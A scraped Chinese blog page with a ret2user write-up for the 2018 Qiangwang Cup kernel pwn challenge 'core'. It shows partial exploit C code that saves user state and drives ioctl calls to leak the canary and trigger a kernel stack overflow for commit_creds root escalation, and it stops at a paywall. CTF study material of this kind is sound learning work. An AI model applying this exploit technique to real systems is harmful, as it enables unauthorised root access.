强网杯 2018 core ret2user做法

最新推荐文章于 2022-05-09 19:48:25 发布
最新推荐文章于 2022-05-09 19:48:25 发布
阅读量1.4k 收藏
点赞数
分类专栏: kernel pwn 文章标签: linux pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/124156492
版权

关于题目的具体分析移步
强网杯 2018 core ROP做法

这里就只介绍ret2user这种做法,不再对题目进行具体分析。

这个题没有smep,所以可以直接在内核态执行用户态的代码,所以我们可以自己写一个执行commit_creds(prepare_kernel_cred(0))的函数,然后修改返回地址到那个函数,之后再进入用户态执行system(/bin/sh\x00)来起shell,省去了找gadget编写rop的过程

exp:

#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>

size_t user_cs, user_ss, user_rflags, user_sp;

//intel 保存用户态
void save_status(){
   
        __asm__("mov user_cs,cs;"
                "mov user_ss,ss;"
                "mov user_sp,rsp;"
                "pushf;"
                "pop user_rflags;"
               );
        puts("[*] saved !");
}

//leak canary
void core_read(int fd, char *user_buf){
   
        ioctl(fd, 0x6677889B, user_buf);
}

//set off
void set_off(int fd, long long len){
   
        ioctl(fd, 0x6677889C, len);
}

//stack overflow
void core_copy_func(int fd, long long len){
   
        ioctl(
最低0.47元/天 解锁文章
Ayakaaaa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
强网杯 2018 core ROP做法
weixin_46483787的博客
04-13 511
学kernel的第二天,仍然很不想学····· 拿到题目看下init先: #!/bin/sh mount -t proc proc /proc mount -t sysfs sysfs /sys mount -t devtmpfs none /dev /sbin/mdev -s mkdir -p /dev/pts mount -vt devpts -o gid=4,mode=620 none /dev/pts chmod 666 /dev/ptmx cat /proc/kallsyms > /tmp/
kernel-ROP 2018 强网杯 - core
qq_41071646的博客
07-13 1326
参考链接 CTF wiki https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/kernel_rop-zh/ 说实话 看见强网杯 这三个字 我笑了 2019年的那些pwn 题 真的多 不当人 当时因为我再看 逆向所以 pwn 就负责人一个人 比较难受 暑假多学一些pwn 能够分担pwn 压力吧 然后今天看了一下 k...
强网杯2018_core
z1r0的博客
03-21 839
强网杯2018_core 具体可以看z1r0’s blog 题目拿到手就是一个tar包。解压 ➜ 2018强网杯-core tar -xvf core_give.tar give_to_player/ give_to_player/bzImage give_to_player/core.cpio give_to_player/start.sh give_to_player/vmlinux ➜ 2018强网杯-core ls core_give.tar give_to_player ➜ 2018强网
kernel ROP - 2018 强网杯 - core
qq_51687381的博客
05-09 180
初学kernel,做个笔记。 Kernel ROP - CTF Wiki wiki上有着详细的分析,这里只对一些wiki上没有讲到的做个笔记。 首先是对文件: 引用一句其他师傅的话:类比于libc中的pwn,感觉*.ko就是binary文件,vmlinux就是libc … 不同的是保护机制是由如何启动决定的(start.sh 中修改)。 Rop大体思路: 栈上有Canary防护的话,需要先泄露出Canary,来促使Rop Rop具体思路是和Libc中的类似,利用一些寄存器进行传值 调用com
linux_kernal_pwn 2018 强网杯 - core
yongbaoii的博客
09-01 305
四个文件,vmlinux不用提取了。 开了kaslr。 我们说内核的保护分四种,隔离、访问控制、异常检测、随机化。 随机化有两种,一个是kaslr,一个是fgkaslr。 在开启了 KASLR 的内核中,内核的代码段基地址等地址会整体偏移。 然后解压文件系统,看看init文件相关配置。 mkdir core cp core.cpio ./core cd core mv ./core.cpio core.cpio.gz #因为cpio是经过gzip压缩过的,必须更改名字,gunzip才认识 gu.
pwn07.ret2syscall例题
11-11
ret2syscall例题
0001-TIPS-2020-hxp-kernel-rop : ret2user
最新发布
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc2pwn 入门题
02-11
pwn 入门题
2018强网
aoque9909的博客
04-01 288
先占个楼 看着writeup慢慢学吧。。 转载于:https://www.cnblogs.com/ZHijack/p/8659885.html
linux内核pwn,[原创]linux kernel pwn 分析(一) 强网core + ciscn babydriver
weixin_42588672的博客
04-29 510
通用的提权代码是commit_creds(prepare_kernel_cred(0));这两个函数如何动态获得?借助/proc/kallsyms符号表,在运行时动态读取。这个很容易实现,贴出一例:unsigned long find_symbol_by_proc(char *file_name, char *symbol_name){FILE *s_fp;char buff[200] = {0}...
2018年强网杯初赛 逆向题目 hide writeup (超详细)
风如激的博客
03-28 3935
这道题有壳,strings搜索是upx3.91。但是不能用upx -d。只好手动脱壳了。难点在于本题目有反调试,有些函数不能步过。首先研究壳。第一句call必须步入。Sub_44f1c5必须步入。 Sub_44F1C5中,0x44f214的rep指令把0x400000到0x44f248复制到0x800000位置。0x44f22c处,rbp是0x84efb5。这句话是start处的第二条指令。这里不...
2018强网杯记录
飞花的世界
03-29 4797
 1 签到题 2welcome下载文件,发现是一个BMP图片文件。于是使用Stegsolve工具分离,发现,得到flag 3 streamgame1上脚本1#! /usr/bin/env python3# coding:utf8def lfsr(R,mask):    output = (R &lt;&lt; 1) &amp; 0xffffff    i=(R&amp;mask)&amp;0xff...
linux kernel pwn学习之ROP
seaaseesa的博客
02-29 1235
Linux Kernel ROP Linux kernel rop根glibc下的ROP思路是差不多的,当我们学习掌握了glibc下的ROP,再来看kernel的ROP攻击,就很容易理解了。 与用户态同样的是,内核有也类似于PIE的机制,加kaslr,在启动系统时的脚本里可以指定开启或关闭kaslr。 qemu-system-x86_64\ -m256M\ -kernel...
linux内核提取ret2usr,kernel pwn(0):入门&ret2usr
weixin_29079643的博客
05-07 419
一、序言从栈、格式化串,再到堆,当这些基本的攻击面都过下来以后,对于劫持流程拿shell的过程就应该非常熟悉了,然而传统的exploit拿到的shell的权限并非最高的,而kernel pwn的核心目标就是拿到一个具有root权限的shell,其意义就在于提权。二、kernel pwn简介1.一般背景:内核pwn的背景一般都是Linux内核模块所出现的漏洞的利用。众所周知,Linux的内核被设置成...
强网杯misc4writeup
qq_33565146的博客
09-11 396
流量分析: 使用wireshark分析数据包得到,为两个IP通信,端口为8080: 过滤http协议查看到操作如下: 使用了tomcat:tomcat弱口令登陆进入了tomcat的manager。查看到可以上传war文件: 恢复后查看如下: 利用该按钮上传了一个压缩文件: 导出恢复后发现为冰蝎的jsp马。 查看版本为1.0版本,接下来请求冰蝎的一句话木马,请求...
linux内核栈溢出,【Linux内核漏洞利用】2018强网core_栈溢出
weixin_34329874的博客
05-01 368
一.linux内核漏洞利用预备知识1.介绍(1)ioctl :用于与设备通信。int ioctl(int fd, unsigned long request, ...) 的第一个参数为打开设备 (open) 返回的 文件描述符,第二个参数为用户程序对设备的控制命令,再后边的参数则是一些补充参数,与设备有关。(2)struct cred:kernel 记录了进程的权限,更具体的,是用 cred 结构...
ret2shellcode
03-17
ret2shellcode 是一种攻击技术,通常用于在计算机系统中绕过安全防护机制,执行恶意操作。这种技术通过利用程序中的缓冲区溢出漏洞,在返回到函数的返回地址处插入恶意代码,来达到控制程序流程并执行恶意操作的目的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值